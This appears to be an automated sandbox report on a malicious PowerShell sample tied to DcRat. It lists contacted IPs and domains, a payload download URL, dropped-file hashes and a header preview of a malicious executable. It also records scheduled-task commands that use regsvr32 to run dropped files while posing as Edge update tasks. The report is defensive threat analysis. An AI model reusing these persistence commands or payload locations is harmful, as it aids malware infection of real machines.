                                            • URL Reputation: safe
                                            		unknown
                                            https://discordapp.comOpenWith.exe, 0000000B.00000003.1635591198.000001BD877F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://contoso.com/Iconpowershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmptrue
                                                		unknown
                                                https://rocketdocs.lolpowershell.exe, 00000001.00000002.1462792465.0000018C0F76A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://contoso.com/powershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1541187527.0000018C1E0B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1541187527.0000018C1E1F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://rocketdocs.lolpowershell.exe, 00000001.00000002.1462792465.0000018C0FBB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://aka.ms/pscore68powershell.exe, 00000001.00000002.1462792465.0000018C0E041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1441747026.000001D898171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://bemostake.space/test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exeHtjpowershell.exe, 00000001.00000002.1462792465.0000018C0F672000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://bemostake.spacepowershell.exe, 00000001.00000002.1462792465.0000018C0F731000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://bemostake.spacepowershell.exe, 00000001.00000002.1462792465.0000018C0F72C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1462792465.0000018C0F672000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1462792465.0000018C0E041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1441747026.000001D898171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          195.93.190.6
                                                          		unknownUkraine
                                                          		15713GCN-UAfalse
                                                          104.233.104.126
                                                          		unknownSaudi Arabia
                                                          		13886CLOUD-SOUTHUSfalse
                                                          148.251.23.146
                                                          		unknownGermany
                                                          		24940HETZNER-ASDEfalse
                                                          163.172.136.118
                                                          		unknownUnited Kingdom
                                                          		12876OnlineSASFRfalse
                                                          95.215.44.78
                                                          		unknownLatvia
                                                          		52173MAKONIXLVfalse
                                                          193.124.186.205
                                                          		unknownRussian Federation
                                                          		35196IHOR-ASRUfalse
                                                          46.29.238.96
                                                          		unknownRussian Federation
                                                          		34804EUROTELECOM-ASRUtrue
                                                          8.8.8.8
                                                          		unknownUnited States
                                                          		15169GOOGLEUSfalse
                                                          37.97.185.116
                                                          		unknownNetherlands
                                                          		20857TRANSIP-ASAmsterdamtheNetherlandsNLfalse
                                                          130.133.110.14
                                                          		unknownGermany
                                                          		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                                                          194.249.212.109
                                                          		unknownSlovenia
                                                          		2107ARNES-NETAcademicandResearchNetworkofSloveniaSIfalse
                                                          136.243.141.187
                                                          		unknownGermany
                                                          		24940HETZNER-ASDEfalse
                                                          37.187.122.30
                                                          		unknownFrance
                                                          		16276OVHFRfalse
                                                          147.45.126.71
                                                          		unknownRussian Federation
                                                          		2895FREE-NET-ASFREEnetEUtrue
                                                          185.14.30.213
                                                          		unknownUkraine
                                                          		21100ITLDC-NLUAfalse
                                                          185.58.206.164
                                                          		unknownRussian Federation
                                                          		35196IHOR-ASRUfalse
                                                          51.254.84.212
                                                          		unknownFrance
                                                          		16276OVHFRfalse
                                                          80.87.193.193
                                                          		unknownRussian Federation
                                                          		29182THEFIRST-ASRUfalse
                                                          46.229.52.198
                                                          		unknownUkraine
                                                          		34056KIEVNETKievNetISPASUAfalse
                                                          104.223.122.15
                                                          		unknownUnited States
                                                          		8100ASN-QUADRANET-GLOBALUStrue
                                                          188.114.97.3
                                                          		rocketdocs.lolEuropean Union
                                                          		13335CLOUDFLARENETUSfalse
                                                          205.185.116.116
                                                          		unknownUnited States
                                                          		53667PONYNETUSfalse
                                                          85.21.144.224
                                                          		unknownRussian Federation
                                                          		8402CORBINA-ASOJSCVimpelcomRUfalse
                                                          188.114.96.3
                                                          		bemostake.spaceEuropean Union
                                                          		13335CLOUDFLARENETUSfalse
                                                          185.196.9.174
                                                          		unknownSwitzerland
                                                          		42624SIMPLECARRIERCHtrue
                                                          198.98.51.198
                                                          		unknownUnited States
                                                          		53667PONYNETUSfalse

                                                          Private

                                                          IP
                                                          192.168.2.8
                                                          192.168.2.7
                                                          192.168.2.9
                                                          192.168.2.5
                                                          192.168.2.255

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1529309
                                                          Start date and time:2024-10-08 20:50:11 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 12m 29s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:25
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:test.ps1
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winPS1@28/22@3/31
                                                          EGA Information:
                                                          • Successful, ratio: 66.7%
                                                          HCA Information:Failed
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .ps1

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 199.232.210.172, 93.184.221.240
                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, time.windows.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target OpenWith.exe, PID 6960 because there are no executed function
                                                          • Execution Graph export aborted for target powershell.exe, PID 5884 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 7088 because it is empty
                                                          • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size exceeded maximum capacity and may have missing network information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: test.ps1

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          14:51:20API Interceptor87x Sleep call for process: powershell.exe modified
                                                          14:52:00API Interceptor3538585x Sleep call for process: utox_x86_x64.exe modified
                                                          14:52:02API Interceptor1x Sleep call for process: wmpnscfg.exe modified
                                                          14:52:25API Interceptor1x Sleep call for process: regsvr32.exe modified
                                                          20:51:28Task SchedulerRun new task: MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C} path: regsvr32 s>/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini
                                                          20:52:12Task SchedulerRun new task: MicrosoftEdgeUpdateTaskMachineUA{848CC004-CC00-4888-C000-44488CCC0488} path: regsvr32 s>/s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          37.97.185.116path.ps1Get hashmaliciousDcRatBrowse
                                                            81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                              195.93.190.6path.ps1Get hashmaliciousDcRatBrowse
                                                                81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                  104.233.104.126path.ps1Get hashmaliciousDcRatBrowse
                                                                    81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                      148.251.23.146path.ps1Get hashmaliciousDcRatBrowse
                                                                        130.133.110.14path.ps1Get hashmaliciousDcRatBrowse
                                                                          194.249.212.109path.ps1Get hashmaliciousDcRatBrowse
                                                                            81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                              136.243.141.187path.ps1Get hashmaliciousDcRatBrowse
                                                                                81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                  163.172.136.118path.ps1Get hashmaliciousDcRatBrowse
                                                                                    81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                      95.215.44.78path.ps1Get hashmaliciousDcRatBrowse
                                                                                        81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                          193.124.186.205path.ps1Get hashmaliciousDcRatBrowse
                                                                                            81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              bg.microsoft.map.fastly.netSecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                              • 199.232.214.172
                                                                                              Demande de proposition de AVANTAGE INDUSTRIEL INC.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                              • 199.232.214.172
                                                                                              O4zPA1oI9Y.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                              • 199.232.214.172
                                                                                              Y1ZqkGzvKm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 199.232.210.172
                                                                                              Y1ZqkGzvKm.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                              • 199.232.210.172
                                                                                              https://www.google.com.bo/url?url=https://coqjcqixwpeuzndc&hpj=jguragr&fwbtzg=qoe&ffzzf=olnshn&aes=fvotjnl&garqe=txbrxc&emrj=ycbtmrgd&uwzlcgsurn=eygnbnharg&q=amp/jhjn24u.v%C2%ADvg%C2%ADzy%C2%ADnp%C2%ADe%C2%ADw%C2%ADl%C2%ADkkukl.com%E2%80%8B/4b3puorbt&vijx=zlglfoj&qcobrch=pupf&cjaim=omgedz&guneqiu=xqm&d=DwMFAgGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              https://simpleinvoices.io/invoices/gvexd57Lej7Get hashmaliciousUnknownBrowse
                                                                                              • 199.232.214.172
                                                                                              http://js.schema-forms.orgGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.214.172
                                                                                              https://u9313450.ct.sendgrid.net/ls/click?upn=u001.ZfA-2BqTl2mXIVteOCc-2BANg3DC2QYjSoauaoyveU6MGzQ5VY-2FjA-2F-2FRincDy1KlklBXiPJP_QABV8lal1FXq8md0G3-2FIRFNEx2OV-2FLWSv5ByAZvXcaLdzn8wfCvTlDds0ovRZhRFzHNfaxKr2UfovDpEFdLigcTlhUu24CyUOQvOCn6w-2BHb3x6-2BV4Gc9geo2lLTncL6JUMk6T71-2BqjLFsmgG-2BXpvetiYOby06i5CliURFDYqQTT1C2IqhXHNpvN85ZEXfc5YBJaPCdYG7GCx3syxYrFYTqrHhY55-2BpbwTxDCwDN1-2BlowHglPUt5r1G9-2FvJEFg-2F5ssADCqEBOqtEhmmm5GgEypOrZiDwmybFJCcbqY1CFgUEEhAhZH7kmvwleWNlpfoBdGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.214.172
                                                                                              http://customer.thewayofmoney.usGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              rocketdocs.lolpath.ps1Get hashmaliciousDcRatBrowse
                                                                                              • 188.114.97.3

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              OnlineSASFRpath.ps1Get hashmaliciousDcRatBrowse
                                                                                              • 163.172.136.118
                                                                                              https://yourferguson.org/court-watch-october-30-2023/?fbclid=IwZXh0bgNhZW0CMTEAAR3dOwpQMI1HpEJMcLfneo2Ce-TuuXHtVI8-78YDrHW9adORVlMEABT0ELU_aem_CL7dDvEuGMkB8YFGhVQWUgGet hashmaliciousUnknownBrowse
                                                                                              • 212.129.43.222
                                                                                              SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                                                              • 62.210.201.207
                                                                                              SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                                                              • 62.210.201.207
                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                              • 51.158.219.42
                                                                                              aA45th2ixY.exeGet hashmaliciousXmrigBrowse
                                                                                              • 51.15.58.224
                                                                                              http://ak437453-76542337354.com/Get hashmaliciousUnknownBrowse
                                                                                              • 51.158.227.247
                                                                                              https://wtm.entree-plat-dessert.com/r/eNpNj1uTojAQhX8N+6aYG4SHqS0VWHXB9Vbj4stUCAGDXJyQ6OKv38zbdPXDV+d096l+ugGEHqAuED7GiAhQAMooRDiABQc5LH3MCBXCBRQRF/vEzSHiXglnyKdF4RHEwAx6EAQ5w7aC0vVcQNze/WnerlrfBwfNHRjbZlybacuUFLxhUolpqazKjRxkJyxpprSYMDPJVc/7Rk4GZriYcKPUOOFWcuASYD/wCJyy4e6gmOmPVhTStA4KRaE/bIIDPdZab2E9bonJqrPus+F925pGy+8DQ28UF1/LnVZC3BumCzEMQukfBX/zy8terrvuDI76doov9WG1mh1q7Z19Ss3Yb45ZwoN2mR6jT/gv/zsm6EqiYVNXy/EQZy/jwEXrD3tCSLV+be2H/q7u9CuDFsPPMLvmyfr3fPt4l+v9Zb5vg67LCKw31zGsM/JK8GkbJBEGYeWd0hSI4hzT3QPXvyL5x95+7goVLhqqWHqoUVJ9xW00jWrQL3OSnld9f8tv7HEL/wMooptNGet hashmaliciousUnknownBrowse
                                                                                              • 212.129.3.112
                                                                                              81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                              • 163.172.136.118
                                                                                              WannaCry.bin.zipGet hashmaliciousConti, WannacryBrowse
                                                                                              • 163.172.131.88
                                                                                              CLOUD-SOUTHUSpath.ps1Get hashmaliciousDcRatBrowse
                                                                                              • 104.233.104.126
                                                                                              81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                              • 104.233.104.126
                                                                                              final_payload.bin.exeGet hashmaliciousXWormBrowse
                                                                                              • 216.173.64.63
                                                                                              https://askallegiance.comGet hashmaliciousUnknownBrowse
                                                                                              • 104.167.193.130
                                                                                              https://usps-track-packages.comGet hashmaliciousUnknownBrowse
                                                                                              • 216.173.64.194
                                                                                              Lisect_AVT_24003_G1B_122.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.143.250.45
                                                                                              SlHgSOYcMY.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.167.217.91
                                                                                              iMJZGYeU7K.elfGet hashmaliciousMiraiBrowse
                                                                                              • 38.130.219.186
                                                                                              INVOICE087667899.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.233.20.196
                                                                                              EXTERNAL Desert Diamond Casinos Entertainment- New Purchase Order 8433333.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.167.241.201
                                                                                              HETZNER-ASDEpath.ps1Get hashmaliciousDcRatBrowse
                                                                                              • 136.243.141.187
                                                                                              ssk7Ah3h5D.elfGet hashmaliciousUnknownBrowse
                                                                                              • 116.203.104.203
                                                                                              https://hnt.zkg.mybluehost.me/CA/LETGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 135.181.58.223
                                                                                              SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                                                              • 136.243.38.220
                                                                                              SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                                                              • 136.243.38.220
                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                              • 138.201.28.181
                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                              • 116.203.104.203
                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                              • 116.203.104.203
                                                                                              reswnop.exeGet hashmaliciousEmotetBrowse
                                                                                              • 138.201.140.110
                                                                                              7AeSqNv1rC.exeGet hashmaliciousMicroClip, VidarBrowse
                                                                                              • 49.12.106.214
                                                                                              GCN-UApath.ps1Get hashmaliciousDcRatBrowse
                                                                                              • 195.93.190.6
                                                                                              81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                              • 195.93.190.6
                                                                                              file.exeGet hashmaliciousSystemBCBrowse
                                                                                              • 91.192.136.48

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              28a2c9bd18a11de089ef85a160da29e4path.ps1Get hashmaliciousDcRatBrowse
                                                                                              • 4.175.87.197
                                                                                              • 172.202.163.200
                                                                                              • 40.69.42.241
                                                                                              • 13.107.246.60
                                                                                              SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                              • 4.175.87.197
                                                                                              • 172.202.163.200
                                                                                              • 40.69.42.241
                                                                                              • 13.107.246.60
                                                                                              Demande de proposition de AVANTAGE INDUSTRIEL INC.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                              • 4.175.87.197
                                                                                              • 172.202.163.200
                                                                                              • 40.69.42.241
                                                                                              • 13.107.246.60
                                                                                              https://shorturl.at/yPmuH?sEBM=mt3zoN1OfGet hashmaliciousUnknownBrowse
                                                                                              • 4.175.87.197
                                                                                              • 172.202.163.200
                                                                                              • 40.69.42.241
                                                                                              • 13.107.246.60
                                                                                              https://www.baidu.com/link?url=7AgUGxkCgEsQdPm9T1PXcA0XghaPOWMLvdhGyyVngg844uS4x-KZy4IMqs1ov0OgdFqhAB-_X2oOV9exK4hWC_&wd=ZWxraW58WTI5eVpUUmpaUzVqYjIwPXxNYkdVSlpkdVROdWNyeW1UWU1laElVVW1QbGRGb0F5RmNLcWJadW1CT01YYw==Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 4.175.87.197
                                                                                              • 172.202.163.200
                                                                                              • 40.69.42.241
                                                                                              • 13.107.246.60
                                                                                              77IyY7nCKB.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 4.175.87.197
                                                                                              • 172.202.163.200
                                                                                              • 40.69.42.241
                                                                                              • 13.107.246.60
                                                                                              EDc1DW9OsQ.xlsxGet hashmaliciousUnknownBrowse
                                                                                              • 4.175.87.197
                                                                                              • 172.202.163.200
                                                                                              • 40.69.42.241
                                                                                              • 13.107.246.60
                                                                                              Atlanta Office Interiors #024-010.pdfGet hashmaliciousUnknownBrowse
                                                                                              • 4.175.87.197
                                                                                              • 172.202.163.200
                                                                                              • 40.69.42.241
                                                                                              • 13.107.246.60
                                                                                              https://dc.dolshgdh.site/?Ufrj=g5Get hashmaliciousUnknownBrowse
                                                                                              • 4.175.87.197
                                                                                              • 172.202.163.200
                                                                                              • 40.69.42.241
                                                                                              • 13.107.246.60
                                                                                              EPAYMENT_Receipt.htmlGet hashmaliciousUnknownBrowse
                                                                                              • 4.175.87.197
                                                                                              • 172.202.163.200
                                                                                              • 40.69.42.241
                                                                                              • 13.107.246.60
                                                                                              3b5074b1b5d032e5620f69f9f700ff0epath.ps1Get hashmaliciousDcRatBrowse
                                                                                              • 188.114.97.3
                                                                                              • 188.114.96.3
                                                                                              playmod24.vbsGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.97.3
                                                                                              • 188.114.96.3
                                                                                              shipment details.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 188.114.97.3
                                                                                              • 188.114.96.3
                                                                                              XDA_CDS v6.8.54_SE.exeGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.97.3
                                                                                              • 188.114.96.3
                                                                                              Y1ZqkGzvKm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 188.114.97.3
                                                                                              • 188.114.96.3
                                                                                              Y1ZqkGzvKm.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                              • 188.114.97.3
                                                                                              • 188.114.96.3
                                                                                              E_receipt.vbsGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.97.3
                                                                                              • 188.114.96.3
                                                                                              EY10AIvC8B.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 188.114.97.3
                                                                                              • 188.114.96.3
                                                                                              EY10AIvC8B.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                              • 188.114.97.3
                                                                                              • 188.114.96.3
                                                                                              92ZZIUHzPQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 188.114.97.3
                                                                                              • 188.114.96.3

                                                                                              Dropped Files

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              C:\Users\user\AppData\Roaming\oSyU.ini81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                C:\Users\user\AppData\Roaming\4smg.ini81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                  C:\Users\user\Desktop\utox_x86_x64.exepath.ps1Get hashmaliciousDcRatBrowse

                                                                                                    Created / dropped Files

                                                                                                    C:\Users\Public\ajbs50ul.bat

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2322503
                                                                                                    Entropy (8bit):7.351293589769997
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:fIGHiuBfswUwl+GdRI2UET1SUvj0Ug6j9iuXWvpAqahtX8+34+vSVHstzn+qpEjs:fNCuBfZ4GdfUaj0UgM5WviXtT34+vBJV
                                                                                                    MD5:8837DF25AABC4FAD85E851ACA192F714
                                                                                                    SHA1:C4FBD38356B7EE16EAF21DEB83170BBCB0FE566A
                                                                                                    SHA-256:741CEE2C6F6F8EE8A54923FA2A0C88085CEDE35BDC2E95B1B9F1800E894E6C19
                                                                                                    SHA-512:93F712AE3CA726B090DF270FEB1421EA98778260B7FE309E06AC3887B396D3DC8AB41655EC7D15A57CAC8B467CCA0395A52EF965765A26C9597F6512FDAD88E2
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...w-.f....e.....&....*.......................@............................. ......J.#...`... .................................................H............`...t...........................................J..(...................................................text...............................`..`.data...............................@....rdata..............................@..@.pdata...t...`...v...D..............@..@.xdata..p...........................@..@.bss.....................................idata..H............r..............@....CRT....h...........................@....tls................................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\regsvr32.EXE.log

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):434
                                                                                                    Entropy (8bit):5.383282394444275
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:Q3La/KDLI4MWuPXcp151KDLI4MN5I/k1Bv:ML9E4KQ71qE4GIsD
                                                                                                    MD5:00930768B2E044245AC5529BC4F2FFDF
                                                                                                    SHA1:DF262F47F31653AAE570477B12B90B2E385A8D50
                                                                                                    SHA-256:E0A23AC0FD66AC2AD5922D20187B374A1B7B148FF47CABB69441EB2F699008C8
                                                                                                    SHA-512:76F371B3D2FCE707DA45DCA1755DE56BA7AC8827E5F18F900E52AEF35AEF3D42B39F656CC08A10372872BA601AFD9E6F3D930A98F92A3F9A885E9B6CBAF38ADA
                                                                                                    Malicious:false
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                    Malicious:false
                                                                                                    Preview:@...e...........................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1fpywe1a.3ki.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ed4h13m.zby.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

